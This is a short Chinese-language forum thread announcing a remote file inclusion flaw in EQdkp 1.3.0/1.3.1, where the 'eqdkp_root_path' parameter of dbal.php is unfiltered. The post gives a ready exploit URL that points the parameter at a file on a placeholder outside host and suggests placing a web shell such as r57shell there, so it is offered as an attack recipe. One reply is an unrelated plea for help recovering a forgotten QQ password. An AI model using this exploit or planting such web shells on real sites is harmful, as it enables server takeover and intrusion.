EQdkp 1.3.0/1.3.1版本 远程包含漏洞
<P>EQdkp 1.3.0/1.3.1版本</P><P>漏洞信息:简单的说远程攻击者可以利用漏洞以WEB进程权限执行任意PHP命令。<BR>具体情节是'dbal.php'脚本对用户提交的'eqdkp_root_path'参数缺少过滤<BR>指定远程服务器上的任意文件作为包含对象,可导致以WEB权限执行任意PHP代码<BR>利用方法:<A href="http://www.xxx.cn/includes/dbal.php?eqdkp_root_path=http://XXX.cn/logging.txt?" tip target=_blank>http://www.XXX.cn/includes/dbal.php?eqdkp_root_path=http://XXX.cn/logging.txt?</A></P>
<P><A href="http://xxx.cn/logging.txt" tip target=_blank>http://XXX.cn/logging.txt</A> 是你网站是的PHP代码! 要是E文的! 比如r57shell</P>
re:EQdkp 1.3.0/1.3.1版本 远程包含漏洞
<table width=99% border=0 align=center cellpadding=4 cellspacing=1 bgcolor=#999999><tr><td bgcolor=#ffffee><font color=#568AC2>回复: 杀残的神</font>哪位哥哥能告我怎么把QQ密码找回来啊!我无先感激啊!我那天晚上改完密码就出去玩了!等回来想上QQ突然间就记不起密码了想了一晚上也没想起来</td></tr></table>
页:
[1]